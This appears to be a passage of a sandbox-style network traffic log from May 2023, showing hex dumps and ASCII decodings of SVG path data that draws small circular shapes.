                                                                                                                                                                                                                                                                                        Data Ascii: class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.88,216.7a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC466INData Raw: 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 2e 30 35 2c 31 35 36 2e 31 39 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22
                                                                                                                                                                                                                                                                                        Data Ascii: 36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846.05,156.19a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC482INData Raw: 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 38 36 2c 32 39 33 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32
                                                                                                                                                                                                                                                                                        Data Ascii: ,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.86,293.45a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC498INData Raw: 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2e 32 36 2c 32 33 39 2e 37 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M800.26,239.77a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.9
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC514INData Raw: 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 34 2e 37 33 2c 32 32 31 2e 35 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39
                                                                                                                                                                                                                                                                                        Data Ascii: 37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M504.73,221.53a1.92,1.92,0,0,1-.87,2.49,2.79,2.79
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC530INData Raw: 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 35 35 2c 38 31 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: ="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M523.55,81.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC546INData Raw: 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 35 32 2c 31 35 37 2e 39 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                                        Data Ascii: .66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M557.52,157.94a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC562INData Raw: 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 34 39 2c 32 33 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                                                        Data Ascii: 9,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path class="cls-7" d="M591.49,234a1.92,1.92,0,0,1-.87,2.49,2.78,2.78,0,0,1-3.71-1.05,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><pa
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC578INData Raw: 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 30 35 2c 38 36 2e 36 34
                                                                                                                                                                                                                                                                                        Data Ascii: 1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.05,86.64
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC594INData Raw: 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2c 31 36 32 2e 37 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 6,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644,162.74a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC610INData Raw: 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2c 32 33 38 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: "/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M678,238.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC626INData Raw: 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 36 2e 38 31 2c 39 39 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M696.81,99.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC642INData Raw: 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 30 2e 37 38 2c 31 37 35 2e 32 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                                        Data Ascii: 1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M730.78,175.26a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1.05,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"/><path class="
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC658INData Raw: 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 34 39 2c 32 34 33 2e 36 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39
                                                                                                                                                                                                                                                                                        Data Ascii: 22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.49,243.64a1.92,1.92,0,0,1-.87,2.49
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC674INData Raw: 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 34 32 2c 32 35 39 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                                        Data Ascii: .13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.42,259.54a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC690INData Raw: 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 31 35 2c 33 32 30 2e 36 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20
                                                                                                                                                                                                                                                                                        Data Ascii: -4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M688.15,320.61a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9"
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC706INData Raw: 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2c 33 37 33 61 32 2e 31 36
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.68a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M723,373a2.16
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC722INData Raw: 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 37 2c 34 33 34 2e 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c
